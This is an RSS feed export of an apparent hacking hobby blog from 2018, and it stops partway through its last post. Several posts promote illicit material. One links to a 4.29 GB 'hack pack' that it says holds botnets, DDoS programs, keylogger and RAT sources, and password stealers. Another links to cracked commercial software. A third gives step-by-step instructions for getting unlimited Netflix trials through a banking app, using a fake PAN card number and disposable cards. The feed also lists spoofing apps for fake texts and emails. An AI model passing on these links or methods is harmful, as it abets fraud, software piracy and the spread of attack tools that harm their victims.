<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-425675784276321914</atom:id><lastBuildDate>Thu, 19 Dec 2024 03:24:25 +0000</lastBuildDate><category>Krypton-SpeedArt</category><title>KryptonHacking</title><description>HACKING AND TECHNOLOGY</description><link>https://kryptonhackingworld.blogspot.com/</link><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><generator>Blogger</generator><openSearch:totalResults>48</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-5286772720583609068</guid><pubDate>Tue, 29 May 2018 12:45:00 +0000</pubDate><atom:updated>2018-05-29T05:45:49.912-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Krypton-SpeedArt</category><title>Krypton-SpeedArt</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzQi_mcUwnwc3WpH3rI-lCNMbytZPuAeGeNrDQpbrKhBP2Cn1MU3ASZXBhN10L3tkXkhQ3ZvYaj94ME3N0BuGds4QwRLf0dIYDojPvv0Brwi0IXVK_hS9Yp3HrcFB8tWsm0tfsciRi4h8/s1600/download+%25282%2529.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;170&quot; data-original-width=&quot;297&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzQi_mcUwnwc3WpH3rI-lCNMbytZPuAeGeNrDQpbrKhBP2Cn1MU3ASZXBhN10L3tkXkhQ3ZvYaj94ME3N0BuGds4QwRLf0dIYDojPvv0Brwi0IXVK_hS9Yp3HrcFB8tWsm0tfsciRi4h8/s1600/download+%25282%2529.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Drawing THOR-Chris hemsworth&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
hello guys this is the first time for me to post this here on my site and am realy like to accept your suggestions for me watch it and put comments about the video and me&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
DO NOT FORGET TO SHARE AND SUBSCRIBE MY BLOG FOR MORE VIDEOS&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dz2bBUUmtoHz_8VxfGwJj4MO989wg7Yag-J-xHbtg-LUdb2Ae5AhSVPQQtUWyk9E35B0f3elJa7u2l49aOfag&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>https://kryptonhackingworld.blogspot.com/2018/05/krypton-speedart.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzQi_mcUwnwc3WpH3rI-lCNMbytZPuAeGeNrDQpbrKhBP2Cn1MU3ASZXBhN10L3tkXkhQ3ZvYaj94ME3N0BuGds4QwRLf0dIYDojPvv0Brwi0IXVK_hS9Yp3HrcFB8tWsm0tfsciRi4h8/s72-c/download+%25282%2529.png" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-1642442085063538297</guid><pubDate>Tue, 29 May 2018 12:06:00 +0000</pubDate><atom:updated>2018-05-29T05:06:15.166-07:00</atom:updated><title>⭕️Spoofing ⭕️</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzb2alSaD7TGxSpRH46JLghbZ26pxETDIC6piVQH9YiZTnPskNlZt92vyBsS6mIsUsx8E-xMK6jvO4d3Xgvz4ezcaSPoq3L-hLp72lH44JklNFb7kRHeQJRFoFs_5qVM06cHgOxUGChzR2/s1600/download+%25286%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;159&quot; data-original-width=&quot;318&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzb2alSaD7TGxSpRH46JLghbZ26pxETDIC6piVQH9YiZTnPskNlZt92vyBsS6mIsUsx8E-xMK6jvO4d3Xgvz4ezcaSPoq3L-hLp72lH44JklNFb7kRHeQJRFoFs_5qVM06cHgOxUGChzR2/s1600/download+%25286%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
⭕️Spoofing ⭕️&lt;br /&gt;
&lt;br /&gt;
🔱Best Spoofing apps on playstore 🔱&lt;br /&gt;
&lt;br /&gt;
‘Fake text message’ lets you receive fake text messages from anyone you want! Trick your friends and make them believe you received the message of their dream.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.neurondigital.FakeTextMessage&quot;&gt;https://play.google.com/store/apps/details?id=com.neurondigital.FakeTextMessage&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
Create fake chat screenshots that l&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;ooks real!&lt;br /&gt;
WhatsFake presents you the ULTIMATE PRANK for WhatsApp.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.almeria.whatsfake&quot;&gt;https://play.google.com/store/apps/details?id=com.almeria.whatsfake&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
Free US Phone Number With Unlimited Texting &amp;amp; Calling&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.enflick.android.TextNow&quot;&gt;https://play.google.com/store/apps/details?id=com.enflick.android.TextNow&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
Mock Location GPS allows to fake the location of your phone by GPS and other network operators&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.studio.armens.fakelocation&quot;&gt;https://play.google.com/store/apps/details?id=com.studio.armens.fakelocation&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
Temporary disposable email address - protect your email from spam,bots, phishing&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.tempmail&quot;&gt;https://play.google.com/store/apps/details?id=com.tempmail&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
&lt;br /&gt;
Change your Unique Device ID easily and Keep your privacy.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.makeinfo.androididchanger&quot;&gt;https://play.google.com/store/apps/details?id=com.makeinfo.androididchanger&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
&lt;br /&gt;
Send Fake Email using anonymous email id to your friends and family&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.ssinnovations.fakeemail&quot;&gt;https://play.google.com/store/apps/details?id=com.ssinnovations.fakeemail&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
〰〰〰〰〰〰〰〰〰〰〰&lt;br /&gt;
&lt;a href=&quot;https://draft.blogger.com/%F0%9F%94%B0http://www.afreesms.com/freesms/&quot;&gt;🔰http://www.afreesms.com/freesms/&lt;/a&gt; - sms spoof website (highly recommend)🔰</description><link>https://kryptonhackingworld.blogspot.com/2018/05/spoofing.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzb2alSaD7TGxSpRH46JLghbZ26pxETDIC6piVQH9YiZTnPskNlZt92vyBsS6mIsUsx8E-xMK6jvO4d3Xgvz4ezcaSPoq3L-hLp72lH44JklNFb7kRHeQJRFoFs_5qVM06cHgOxUGChzR2/s72-c/download+%25286%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-6900799885854961181</guid><pubDate>Tue, 29 May 2018 12:01:00 +0000</pubDate><atom:updated>2018-05-29T05:01:22.140-07:00</atom:updated><title>NETWORK SECURITY PDF</title><description>🌐 Network security PDF 🌐&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://mega.nz/#F!oawFzJiI!nYW_l4i1a61QtyuS18GnnA&quot;&gt;https://mega.nz/#F!oawFzJiI!nYW_l4i1a61QtyuS18GnnA&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
#Tutorial #Hacking #pdf&lt;br /&gt;
Introduction to Pentesting and Ethical Hacking with Kali Linux&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/download/492h7o887yxexha/&quot;&gt;http://www.mediafire.com/do&lt;/a&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.mediafire.com/download/492h7o887yxexha/&quot;&gt;wnload/492h7o887yxexha/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
#Hacking #PenTesting #Tutorial&lt;br /&gt;
Introduction to Firewalls&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/download/2kczrn29gt6fdp3/&quot;&gt;http://www.mediafire.com/download/2kczrn29gt6fdp3/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
#Hacking #security #Tutorial&lt;br /&gt;
#Wireshark Tutorials:&lt;br /&gt;
&lt;br /&gt;
Introduction to Wireshark:&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/download/ou45m7o4xqt1qdu/&quot;&gt;http://www.mediafire.com/download/ou45m7o4xqt1qdu/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Troubleshooting with Wireshark Tutorials:&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/download/n5exc1bomahud9m/&quot;&gt;http://www.mediafire.com/download/n5exc1bomahud9m/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Wireshark 2.0 Tutorials&lt;br /&gt;
&lt;a href=&quot;http://www.mediafire.com/download/n98viipaz131fhq&quot;&gt;http://www.mediafire.com/download/n98viipaz131fhq&lt;/a&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/network-security-pdf.html</link><author>noreply@blogger.com (Anonymous)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-4177095612602400527</guid><pubDate>Tue, 29 May 2018 11:52:00 +0000</pubDate><atom:updated>2018-05-29T04:52:27.217-07:00</atom:updated><title>HOW TO SAFELY BROWSE  DEEP WEB? </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHBsTPKo34VXtaCaZaQqZtNcrxIKNrVu9VdARnSKWRBFmU2olwJcGbG1ZjDSLdrc00_nV-1lqGgb1Q0T-frwyOQcONCY7x0ucUWd_UuWMZcaKK2kCPm9Mce6HiqoW1ao9scL1SyiPTgpvH/s1600/download+%25285%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;157&quot; data-original-width=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHBsTPKo34VXtaCaZaQqZtNcrxIKNrVu9VdARnSKWRBFmU2olwJcGbG1ZjDSLdrc00_nV-1lqGgb1Q0T-frwyOQcONCY7x0ucUWd_UuWMZcaKK2kCPm9Mce6HiqoW1ao9scL1SyiPTgpvH/s1600/download+%25285%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
HOW TO SAFELY BROWSE&lt;br /&gt;
DEEP WEB?&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
: Security Tips&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
You must have heard of dark web or deep web and as you know its a scary place and its full of skilled cyber criminals. So it becomes necessary to secure yourself while visiting this wild part of internet. Today I am going to tell you about some &lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;precautions that you should must use while surfing dark web. Secure Your Browser Securing your browser must be your top priority as hackers can exploit it to gain access to your machine. So lets talk about some ways by which you can make your browser&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
more hardened.&lt;/div&gt;
&lt;br /&gt;
1. If a website doesn’t use HTTPS, don’t use it.&lt;br /&gt;
&lt;br /&gt;
2. Disable JavaScript using NoScript plugin&lt;br /&gt;
&lt;br /&gt;
3. Disable all the plug ins as they can be used to track/&lt;br /&gt;
exploit your system&lt;br /&gt;
&lt;br /&gt;
4. Don’t use search Engines like Google which track you.&lt;br /&gt;
Instead, go for DuckDuckGo which doesn’t keep the&lt;br /&gt;
records or inject tracking cookies into your browser&lt;br /&gt;
&lt;br /&gt;
5. If you download something from the dark web its ok&lt;br /&gt;
but consider opening it in a sandbox or a virtual&lt;br /&gt;
machine.&lt;br /&gt;
&lt;br /&gt;
6. Don’t use torrent because torrent uses a peer to peer&lt;br /&gt;
connection instead of using TOR network.&lt;br /&gt;
&lt;br /&gt;
7. Don’t maximize TOR browser’s windows as it can be&lt;br /&gt;
used to determine screen size of your device.</description><link>https://kryptonhackingworld.blogspot.com/2018/05/how-to-safely-browse-deep-web.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHBsTPKo34VXtaCaZaQqZtNcrxIKNrVu9VdARnSKWRBFmU2olwJcGbG1ZjDSLdrc00_nV-1lqGgb1Q0T-frwyOQcONCY7x0ucUWd_UuWMZcaKK2kCPm9Mce6HiqoW1ao9scL1SyiPTgpvH/s72-c/download+%25285%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-756672759776119694</guid><pubDate>Tue, 29 May 2018 11:41:00 +0000</pubDate><atom:updated>2018-05-29T04:41:47.596-07:00</atom:updated><title>USEFUL SOFTWARES AND OTHER USEFUL GOOGLE DRIVE LINKS</title><description>USEFUL SOFTWARES AND OTHER USEFUL GOOGLE DRIVE LINKS&lt;br /&gt;
&lt;br /&gt;
here are the list of some website which are useful for us with their downloaad links enjoy&lt;br /&gt;
Sony Sound Forge Pro v11 (Build 272) with Crack&lt;br /&gt;
Size - 330 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1GU59ZAojFFSqLVNnbO7thG0uRrhapi36&quot;&gt;https://drive.google.com/file/d/1GU59ZAojFFSqLVNnbO7thG0uRrhapi36&lt;/a&gt;/view)&lt;br /&gt;
&lt;br /&gt;
Sony Vegas Pro v13 (x64) with Crack&lt;br /&gt;
Size - 400 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1wlK6S0sOeca6A0L2UqUGt8GX6D_ZCPi-&quot;&gt;https://drive.goog&lt;/a&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;a href=&quot;https://drive.google.com/file/d/1wlK6S0sOeca6A0L2UqUGt8GX6D_ZCPi-&quot;&gt;le.com/file/d/1wlK6S0sOeca6A0L2UqUGt8GX6D_ZCPi-&lt;/a&gt;/view)&lt;br /&gt;
&lt;br /&gt;
Autodesk Sketchup Pro 2016 with Crack&lt;br /&gt;
Size - 312 Mb&lt;br /&gt;
Click here (&lt;a href=&quot;https://drive.google.com/file/d/1enQA3MCQgcLE35-FGU83YhWMd48bC_g0/view&quot;&gt;https://drive.google.com/file/d/1enQA3MCQgcLE35-FGU83YhWMd48bC_g0/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
CorelDraw Graphics Suite X7 with Crack&lt;br /&gt;
Size - 1.3 GB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1T2VEdd07TJlWtq4GjsTonM8-V0BYHr2v/view&quot;&gt;https://drive.google.com/file/d/1T2VEdd07TJlWtq4GjsTonM8-V0BYHr2v/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Reccuva Professional 1.52.1086 with Crack&lt;br /&gt;
Size - 5 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1Kg58Y-T1xap2lU80FQoVse1vjwD3xQ8V/view&quot;&gt;https://drive.google.com/file/d/1Kg58Y-T1xap2lU80FQoVse1vjwD3xQ8V/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows XP (SP3) Preactivated ISO&lt;br /&gt;
Size - 623 MB&lt;br /&gt;
Click here to download (&lt;a href=&quot;https://drive.google.com/file/d/1MCnqqEthSwKNqPCKBu-aIoyzUHkl9YH6/view&quot;&gt;https://drive.google.com/file/d/1MCnqqEthSwKNqPCKBu-aIoyzUHkl9YH6/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Atomix Virtual DJ Pro v8 with Crack&lt;br /&gt;
Size - 130 MB&lt;br /&gt;
Download here (&lt;a href=&quot;https://drive.google.com/file/d/1QtSMfVot_Cil0Jw1yhHreoZxF1TWFwfV/view&quot;&gt;https://drive.google.com/file/d/1QtSMfVot_Cil0Jw1yhHreoZxF1TWFwfV/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Daemon Tools Pro v8 with Crack&lt;br /&gt;
Size - 39 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1y8mgJ7nmUl38NXe4tOAHh2qlr7EFzeAz/view&quot;&gt;https://drive.google.com/file/d/1y8mgJ7nmUl38NXe4tOAHh2qlr7EFzeAz/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Hotspot Shield Elite v6.20.9 Multilanguage with Crack&lt;br /&gt;
Size - 25 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1Ah8X9UJkifob7Fu5FIjP8vZPz9AYoWs7/view)&quot;&gt;https://drive.google.com/file/d/1Ah8X9UJkifob7Fu5FIjP8vZPz9AYoWs7/view)&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Wondershare Video Converter Ultimate v8.7.0.5 With Crack.&lt;br /&gt;
Size - 53 MB&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/15SJGZujaYZGmySrIcvhJH3aor_HJcL9Y/view&quot;&gt;https://drive.google.com/file/d/15SJGZujaYZGmySrIcvhJH3aor_HJcL9Y/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
VMWare Workstation Pro v14.0&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1CiMaSZtNMqoUOCnHLQ7SvJFJqgxPJx3G/view&quot;&gt;https://drive.google.com/file/d/1CiMaSZtNMqoUOCnHLQ7SvJFJqgxPJx3G/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
4k Android Wallpapers&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/drive/mobile/folders/1PAZVGUzdfGr9z_wauYzmu52c2jyImiNM&quot;&gt;https://drive.google.com/drive/mobile/folders/1PAZVGUzdfGr9z_wauYzmu52c2jyImiNM&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Books&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/drive/mobile/folders/0B6TUap6XJ89LbnVzSnpIWHB4QWM&quot;&gt;https://drive.google.com/drive/mobile/folders/0B6TUap6XJ89LbnVzSnpIWHB4QWM&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Kali Linux x64 latest iso&lt;br /&gt;
Download (&lt;a href=&quot;https://drive.google.com/file/d/1W42jlzarTFaa7wAq_mGyvTsS-fNi8fRw/view&quot;&gt;https://drive.google.com/file/d/1W42jlzarTFaa7wAq_mGyvTsS-fNi8fRw/view&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DO NOT FORGET TO SHARE AND SUBSCRIBE OUR BLOG</description><link>https://kryptonhackingworld.blogspot.com/2018/05/useful-softwares-and-other-useful.html</link><author>noreply@blogger.com (Anonymous)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-7197325862574568699</guid><pubDate>Tue, 29 May 2018 10:43:00 +0000</pubDate><atom:updated>2018-05-29T03:43:04.204-07:00</atom:updated><title>Biggest Hack Pack ON | 4.29 GB</title><description>HEllo guys today we would like to share u with most of the hacking tools like every hacker should know / have in its hacking tools pack so download and use it as u wish but we do not responsible for anything u have done with it&lt;br /&gt;
&lt;br /&gt;
DONOT FORGET TO SHARE AND SUBSCRIBE OUR BLOG AND JOIN OUR FACE BOOK GROUP&lt;br /&gt;
&lt;br /&gt;
https://www.facebook.com/groups/414321282370838/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
●Anti Viruses&lt;br /&gt;
●BotNets&lt;br /&gt;
●Botting Programs (Ad Fly, ETC)&lt;br /&gt;
●Brute forcing Programs&lt;br /&gt;
●Cracking Pr&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;ograms DDoS&lt;br /&gt;
●Programs Deface Creators&lt;br /&gt;
●Doxing Tools eWhore Packs&lt;br /&gt;
(Fetish) Exploiting Programs (SQL Map, ParanoicScan, Dedi Exploiter, AirCrack)&lt;br /&gt;
●Exploit Scanners (GoogleSeacher, Gr3eNox Exploit Scanner, Joomla Security Scanner, Realuike Exploit Scanner, RFI Scanner V2, RFI Tool, Special RFI, SQL Poison, XSS Scanner)&lt;br /&gt;
●Exploits (Chat Exploits, MSN Hack, System Exploits, Team Speak)&lt;br /&gt;
●Guides (Anonymity, BotNet, Bruteforce, Cracking, DDoSing, Defacing, Doxing, Exploits, Game Hacking, Hacking, IRL Sh*t, Linux OS, Programming, Random, Reverse Engineering, Security, SQL Injection, Viruses, WiFi Sh*t)&lt;br /&gt;
●Hacking (Ann Loader, Password Stealers)&lt;br /&gt;
●Injection Programs (SQL, XSS) MD5 (MD5 Attack, MD5 Toolbox, MD5 Tools)&lt;br /&gt;
●Sharecash Skype Tools (Reslovers, CenSky Crasher, Florision Tools, James Reborn(V5.7), Pops Skype Tool, Skype API)&lt;br /&gt;
●Source Codes (Crypter Sources, DDoS Programs, KEYLOGGERS, RAT Sources, RANDOM SH*T)&lt;br /&gt;
●Tutorials (TOO MANY TO TYPE)&lt;br /&gt;
●Viruses (Batch Virus Creators,&lt;br /&gt;
Binders, Crypters, DNS, Keyloggers, Ratting, Spoofing, Spreading)&lt;br /&gt;
●VPN&#39;S &amp;amp; Proxies&lt;br /&gt;
●WiFi Youtube&lt;br /&gt;
@hackersworldunite&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://mega.nz/#F!gYd1yaLI!z9RoV7G7ehVX79XU4964EQ&quot;&gt;https://mega.nz/#F!gYd1yaLI!z9RoV7G7ehVX79XU4964EQ&lt;/a&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/biggest-hack-pack-on-429-gb.html</link><author>noreply@blogger.com (Anonymous)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-7086505766901762321</guid><pubDate>Tue, 29 May 2018 10:37:00 +0000</pubDate><atom:updated>2018-05-29T03:37:51.101-07:00</atom:updated><title>NETFLIX PREMIUM METHOD</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamsRbYz_GJTt9HIPhACV_OiBzZr93wd_KUFc0-uMziskIu4MDlOevtiTmjdjepuuYFcsOKwhfLxFdiqxRcEY4WJcPgX9HID68-HITe4Lw39tv39tWC9sbzeHOLLjy8d4ZLd2obUD4kFAx/s1600/download+%25284%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;299&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamsRbYz_GJTt9HIPhACV_OiBzZr93wd_KUFc0-uMziskIu4MDlOevtiTmjdjepuuYFcsOKwhfLxFdiqxRcEY4WJcPgX9HID68-HITe4Lw39tv39tWC9sbzeHOLLjy8d4ZLd2obUD4kFAx/s1600/download+%25284%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
NETFLIX PREMIUM METHOD&lt;br /&gt;
&lt;br /&gt;
*How To Get Free Unlimited Debit Card*&lt;br /&gt;
&lt;br /&gt;
1) Install SBI BUDDY APP&lt;br /&gt;
&lt;br /&gt;
2) SIGNUP USING FAKE OR REAL CREDENTIALS&lt;br /&gt;
(YOUR CHOICE)&lt;br /&gt;
&lt;br /&gt;
3)IN KYC SELECT DOCUMENT AS PANCARD AND TYPE GDTPS3050J .( IT IS FAKE YOU CAN USE ANY 4 NUMBERS INSTEAD OF 3050).&lt;br /&gt;
&lt;br /&gt;
SET PIN FOR YOUR A&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;CCOUNT.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4)AFTER THAT SELECT OPTION PAY USING CARD.&lt;br /&gt;
&lt;br /&gt;
5)NOW IT WILL GIVE YOU A CARD.&lt;br /&gt;
IT CAN BE VIEWED IN VIEW CARD OPTION IN PAY USING CARD MENU.&lt;br /&gt;
&lt;br /&gt;
6) NOW AFTER CREATING NETFLIX CLICK CLOSE CARD.YOUR CARD WILL BE CLOSED.&lt;br /&gt;
THEN AGAIN CREATE A NEW CARD USING PAY USING CARD OPTION.&lt;br /&gt;
&lt;br /&gt;
THATS ALL YOU ARE DONE&lt;br /&gt;
&lt;br /&gt;
ENJOY😍&lt;br /&gt;
&lt;br /&gt;
HOW TO GET NETFLIX PREMIUM 4 SCREEN ULTRA HD USING THIS TRICK.&lt;br /&gt;
&lt;br /&gt;
CREATE A FAKE MAIL USING @fakemailbot .&lt;br /&gt;
&lt;br /&gt;
1) CREATE NETFLIX ACCOUNT (USING THE FAKE MAIL CREATED) AND SELECT FREE TRIAL FOR 30 DAYS.&lt;br /&gt;
&lt;br /&gt;
2) GIVE THE CREATED CARD DETAILS AND VERIFY.&lt;br /&gt;
&lt;br /&gt;
3)THATS ALL YOUR ARE DONE.&lt;br /&gt;
NOW CLOSE THE CARD IN SBI BUDDY APP AND CREATE A NEW ONE.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DO THIS TRICK ALL MONTH AND USE NETFLIX 4 SCREEN ULTRA HD FOR LIFE TIME.&lt;br /&gt;
&lt;br /&gt;
(YOU CAN CREATE AS MUCH FAKE MAIL AS YOU WANT USING THE @fakemailbot )</description><link>https://kryptonhackingworld.blogspot.com/2018/05/netflix-premium-method.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamsRbYz_GJTt9HIPhACV_OiBzZr93wd_KUFc0-uMziskIu4MDlOevtiTmjdjepuuYFcsOKwhfLxFdiqxRcEY4WJcPgX9HID68-HITe4Lw39tv39tWC9sbzeHOLLjy8d4ZLd2obUD4kFAx/s72-c/download+%25284%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-8455642876203950411</guid><pubDate>Tue, 29 May 2018 10:22:00 +0000</pubDate><atom:updated>2018-05-29T03:22:33.999-07:00</atom:updated><title>Complete Deep Web Course 2018</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
